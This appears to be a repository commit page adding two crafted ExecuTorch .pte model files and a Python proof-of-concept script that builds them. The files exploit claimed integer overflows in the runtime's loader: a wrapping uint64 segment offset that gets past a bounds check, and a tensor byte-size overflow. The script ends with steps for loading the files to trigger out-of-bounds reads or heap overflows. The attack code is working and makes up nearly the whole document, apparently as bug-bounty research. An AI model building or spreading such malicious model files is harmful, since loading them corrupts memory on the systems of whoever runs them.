hackthesoul commited on
Commit
1080f89
·
1 Parent(s): 07afc9c

ExecuTorch integer overflow PoC

Browse files
malicious_numel_overflow.pte ADDED
Binary file (4.38 kB). View file
 
malicious_offset_overflow.pte ADDED
Binary file (4.38 kB). View file
 
poc_build_malicious_pte.py ADDED
@@ -0,0 +1,276 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ ExecuTorch .pte Integer Overflow PoC — Builds malicious .pte and triggers crash
4
+
5
+ CVE: NEW (unreported)
6
+ CWE-190: Integer Overflow or Wraparound
7
+ Affected: ExecuTorch (all versions using runtime/executor/program.cpp)
8
+
9
+ Vulnerability 1: program.cpp:592
10
+ offset (uint64 from flatbuffer) + size (size_t) overflows, bypassing bounds check.
11
+
12
+ Vulnerability 2: program_validation.cpp:48-79
13
+ Integer overflow checks for tensor numel are COMMENTED OUT.
14
+ """
15
+
16
+ import struct
17
+ import sys
18
+ import os
19
+
20
+ sys.path.insert(0, os.path.join(os.path.dirname(__file__), "gen"))
21
+
22
+ import flatbuffers
23
+ from flatbuffers import builder as fb_builder
24
+ from executorch_flatbuffer import (
25
+ Program, ExecutionPlan, DataSegment, SubsegmentOffsets,
26
+ Tensor, EValue, KernelTypes, Operator, Chain, Instruction,
27
+ Buffer, AllocationDetails, ExtraTensorInfo,
28
+ )
29
+ from executorch_flatbuffer import ScalarType as ST
30
+
31
SEGMENT_DATA_SIZE = 256  # Size in bytes of the on-disk data segment written by build_overflow_pte
32
+
33
def build_overflow_pte(output_path):
    """Build a .pte file whose SubsegmentOffsets entry wraps around uint64.

    The offset stored in the flatbuffer is chosen so that
    ``offset + tensor_nbytes`` wraps to 0 modulo 2**64, which is intended to
    slip past an ``offset + size <= segment_size`` style bounds check in the
    target loader (see module docstring for the claimed location — unverified
    here).

    Args:
        output_path: Path to write the crafted .pte file to.

    Returns:
        output_path, unchanged, for caller convenience.
    """
    b = fb_builder.Builder(4096)

    # Overflow offset: when added to tensor nbytes (64), the uint64 sum
    # wraps around to 0, which compares <= segment size.
    TENSOR_NBYTES = 64  # 4x4 float32
    OVERFLOW_OFFSET = (1 << 64) - TENSOR_NBYTES  # + 64 == 2**64 -> wraps to 0

    # --- SubsegmentOffsets for mutable_data_segments ---
    SubsegmentOffsets.SubsegmentOffsetsStartOffsetsVector(b, 2)
    b.PrependUint64(OVERFLOW_OFFSET)  # index 1: wrapping offset
    b.PrependUint64(0)                # index 0: reserved
    offsets_vec = b.EndVector()

    SubsegmentOffsets.SubsegmentOffsetsStart(b)
    SubsegmentOffsets.SubsegmentOffsetsAddSegmentIndex(b, 0)
    SubsegmentOffsets.SubsegmentOffsetsAddOffsets(b, offsets_vec)
    mutable_seg = SubsegmentOffsets.SubsegmentOffsetsEnd(b)

    # mutable_data_segments vector
    Program.ProgramStartMutableDataSegmentsVector(b, 1)
    b.PrependUOffsetTRelative(mutable_seg)
    mutable_segs_vec = b.EndVector()

    # --- DataSegment describing the trailing raw data ---
    DataSegment.DataSegmentStart(b)
    DataSegment.DataSegmentAddOffset(b, 0)
    DataSegment.DataSegmentAddSize(b, SEGMENT_DATA_SIZE)
    segment = DataSegment.DataSegmentEnd(b)

    Program.ProgramStartSegmentsVector(b, 1)
    b.PrependUOffsetTRelative(segment)
    segments_vec = b.EndVector()

    # --- Tensor whose mutable data resolves through the wrapping offset ---
    # sizes = [4, 4], scalar_type = FLOAT (6), data_buffer_idx = 1
    Tensor.TensorStartSizesVector(b, 2)
    b.PrependInt32(4)
    b.PrependInt32(4)
    sizes_vec = b.EndVector()

    Tensor.TensorStartDimOrderVector(b, 2)
    b.PrependUint8(1)
    b.PrependUint8(0)
    dim_order_vec = b.EndVector()

    # AllocationDetails so the tensor is treated as mutable/planned
    AllocationDetails.AllocationDetailsStart(b)
    AllocationDetails.AllocationDetailsAddMemoryId(b, 1)
    AllocationDetails.AllocationDetailsAddMemoryOffsetLow(b, 0)
    alloc_info = AllocationDetails.AllocationDetailsEnd(b)

    Tensor.TensorStart(b)
    Tensor.TensorAddScalarType(b, 6)  # FLOAT
    Tensor.TensorAddStorageOffset(b, 0)
    Tensor.TensorAddSizes(b, sizes_vec)
    Tensor.TensorAddDimOrder(b, dim_order_vec)
    Tensor.TensorAddDataBufferIdx(b, 1)  # points at the mutable data entry
    Tensor.TensorAddAllocationInfo(b, alloc_info)
    tensor = Tensor.TensorEnd(b)

    # EValue wrapping the tensor
    EValue.EValueStart(b)
    EValue.EValueAddValType(b, KernelTypes.KernelTypes.Tensor)
    EValue.EValueAddVal(b, tensor)
    evalue = EValue.EValueEnd(b)

    ExecutionPlan.ExecutionPlanStartValuesVector(b, 1)
    b.PrependUOffsetTRelative(evalue)
    values_vec = b.EndVector()

    # Minimal ExecutionPlan named "forward"
    plan_name = b.CreateString("forward")
    ExecutionPlan.ExecutionPlanStart(b)
    ExecutionPlan.ExecutionPlanAddName(b, plan_name)
    ExecutionPlan.ExecutionPlanAddValues(b, values_vec)
    plan = ExecutionPlan.ExecutionPlanEnd(b)

    Program.ProgramStartExecutionPlanVector(b, 1)
    b.PrependUOffsetTRelative(plan)
    plans_vec = b.EndVector()

    # --- Build Program root table ---
    Program.ProgramStart(b)
    Program.ProgramAddVersion(b, 0)
    Program.ProgramAddExecutionPlan(b, plans_vec)
    Program.ProgramAddSegments(b, segments_vec)
    Program.ProgramAddMutableDataSegments(b, mutable_segs_vec)
    program = Program.ProgramEnd(b)

    b.Finish(program, b"ET12")
    buf = bytes(b.Output())

    # File layout: flatbuffer | zero padding to 4096 | segment data | header.
    with open(output_path, 'wb') as f:
        f.write(buf)

        # Pad to 4096 alignment so the segment starts on a page boundary.
        padding = (4096 - len(buf) % 4096) % 4096
        f.write(b'\x00' * padding)
        segment_base = len(buf) + padding

        # Write segment data (filler bytes).
        f.write(b'\x41' * SEGMENT_DATA_SIZE)

        # Trailing header: segment_base_offset(8) + program_size(8) +
        # header_length(4) + magic "eh00".
        # NOTE(review): whether the loader actually reads a trailing header
        # (vs. one embedded near the file start) is not verifiable from this
        # file — confirm against the target's file-format code.
        ext_header = struct.pack('<QQI', segment_base, len(buf), 24) + b'eh00'
        f.write(ext_header)

    file_size = os.path.getsize(output_path)
    print(f"[+] Malicious .pte created: {output_path} ({file_size} bytes)")
    print(f"[+] Flatbuffer size: {len(buf)} bytes")
    print(f"[+] Segment base offset: {segment_base}")
    print(f"[+] Overflow offset in SubsegmentOffsets: 0x{OVERFLOW_OFFSET:016X}")
    print(f"[+] When loading 64-byte tensor:")
    print(f"    offset=0x{OVERFLOW_OFFSET:016X} + size=64 = 0x{(OVERFLOW_OFFSET + 64) % (1 << 64):016X} (WRAPS TO 0)")
    print(f"    0 <= segment_size({SEGMENT_DATA_SIZE}) -> bounds check PASSES")
    print(f"    load_into() called with OOB offset -> CRASH / OOB READ")

    return output_path
162
+
163
+
164
def build_numel_overflow_pte(output_path):
    """Build a .pte whose tensor byte-size overflows when computed.

    The tensor declares sizes [2147483647, 2147483647]. The element count
    (numel = 2147483647**2 ~= 4.6e18) still fits in a signed int64, but the
    byte size (numel * 4 for float32 ~= 1.8e19) exceeds INT64_MAX, so any
    unchecked multiplication in the loader wraps. The original author notes
    the loader's overflow checks are commented out (unverified here).

    Args:
        output_path: Path to write the crafted .pte file to.
    """
    b = fb_builder.Builder(4096)

    # DataSegment: small trailing data region.
    DataSegment.DataSegmentStart(b)
    DataSegment.DataSegmentAddOffset(b, 0)
    DataSegment.DataSegmentAddSize(b, 256)
    segment = DataSegment.DataSegmentEnd(b)

    Program.ProgramStartSegmentsVector(b, 1)
    b.PrependUOffsetTRelative(segment)
    segments_vec = b.EndVector()

    # Tensor sizes chosen so numel * element_size overflows int64.
    Tensor.TensorStartSizesVector(b, 2)
    b.PrependInt32(0x7FFFFFFF)  # 2147483647
    b.PrependInt32(0x7FFFFFFF)  # 2147483647
    sizes_vec = b.EndVector()

    Tensor.TensorStartDimOrderVector(b, 2)
    b.PrependUint8(1)
    b.PrependUint8(0)
    dim_order_vec = b.EndVector()

    Tensor.TensorStart(b)
    Tensor.TensorAddScalarType(b, 6)  # FLOAT
    Tensor.TensorAddSizes(b, sizes_vec)
    Tensor.TensorAddDimOrder(b, dim_order_vec)
    Tensor.TensorAddDataBufferIdx(b, 0)
    tensor = Tensor.TensorEnd(b)

    EValue.EValueStart(b)
    EValue.EValueAddValType(b, KernelTypes.KernelTypes.Tensor)
    EValue.EValueAddVal(b, tensor)
    evalue = EValue.EValueEnd(b)

    ExecutionPlan.ExecutionPlanStartValuesVector(b, 1)
    b.PrependUOffsetTRelative(evalue)
    values_vec = b.EndVector()

    plan_name = b.CreateString("forward")
    ExecutionPlan.ExecutionPlanStart(b)
    ExecutionPlan.ExecutionPlanAddName(b, plan_name)
    ExecutionPlan.ExecutionPlanAddValues(b, values_vec)
    plan = ExecutionPlan.ExecutionPlanEnd(b)

    Program.ProgramStartExecutionPlanVector(b, 1)
    b.PrependUOffsetTRelative(plan)
    plans_vec = b.EndVector()

    Program.ProgramStart(b)
    Program.ProgramAddVersion(b, 0)
    Program.ProgramAddExecutionPlan(b, plans_vec)
    Program.ProgramAddSegments(b, segments_vec)
    program = Program.ProgramEnd(b)

    b.Finish(program, b"ET12")
    buf = bytes(b.Output())

    # Same file layout as build_overflow_pte: flatbuffer | padding to 4096 |
    # 256 bytes of segment filler | trailing header.
    with open(output_path, 'wb') as f:
        f.write(buf)
        padding = (4096 - len(buf) % 4096) % 4096
        f.write(b'\x00' * padding)
        seg_base = len(buf) + padding
        f.write(b'\x42' * 256)
        ext_header = struct.pack('<QQI', seg_base, len(buf), 24) + b'eh00'
        f.write(ext_header)

    file_size = os.path.getsize(output_path)
    print(f"\n[+] Numel overflow .pte: {output_path} ({file_size} bytes)")
    print(f"[+] Tensor sizes: [2147483647, 2147483647]")
    # Fixed message: numel itself fits in int64; the int64 overflow is in
    # the byte size (numel * sizeof(float)).
    print(f"[+] numel = 2147483647 * 2147483647 = {0x7FFFFFFF * 0x7FFFFFFF} (fits int64; nbytes = numel * 4 overflows int64!)")
    print(f"[+] validate_tensor() overflow check is COMMENTED OUT -> passes")
    print(f"[+] Allocates tiny buffer, copies huge data -> HEAP OVERFLOW")
243
+
244
+
245
if __name__ == "__main__":
    poc_dir = os.path.expanduser("~/bugbounty_results/executorch/poc")
    # expanduser() only expands the path; it does not create the directory.
    # Without this, both builders fail with FileNotFoundError on a fresh box.
    os.makedirs(poc_dir, exist_ok=True)

    print("=" * 70)
    print("ExecuTorch Integer Overflow PoC Generator")
    print("=" * 70)
    print()

    # PoC 1: SubsegmentOffsets offset overflow
    build_overflow_pte(os.path.join(poc_dir, "malicious_offset_overflow.pte"))

    # PoC 2: Tensor numel overflow
    build_numel_overflow_pte(os.path.join(poc_dir, "malicious_numel_overflow.pte"))

    print()
    print("=" * 70)
    print("VERIFICATION")
    print("=" * 70)
    print()
    print("To verify the crash, load the .pte with ExecuTorch C++ runtime:")
    print()
    print("  #include <executorch/runtime/executor/program.h>")
    print("  auto program = Program::load(\"malicious_offset_overflow.pte\");")
    print("  auto method = program->load_method(\"forward\");")
    print("  // -> Triggers OOB read in load_mutable_subsegment_into()")
    print()
    print("Or with Python:")
    print()
    print("  from executorch.runtime import Runtime, Program")
    print("  program = Program('malicious_offset_overflow.pte')")
    print("  method = program.load_method('forward')")
    print("  // -> SIGSEGV or SIGBUS")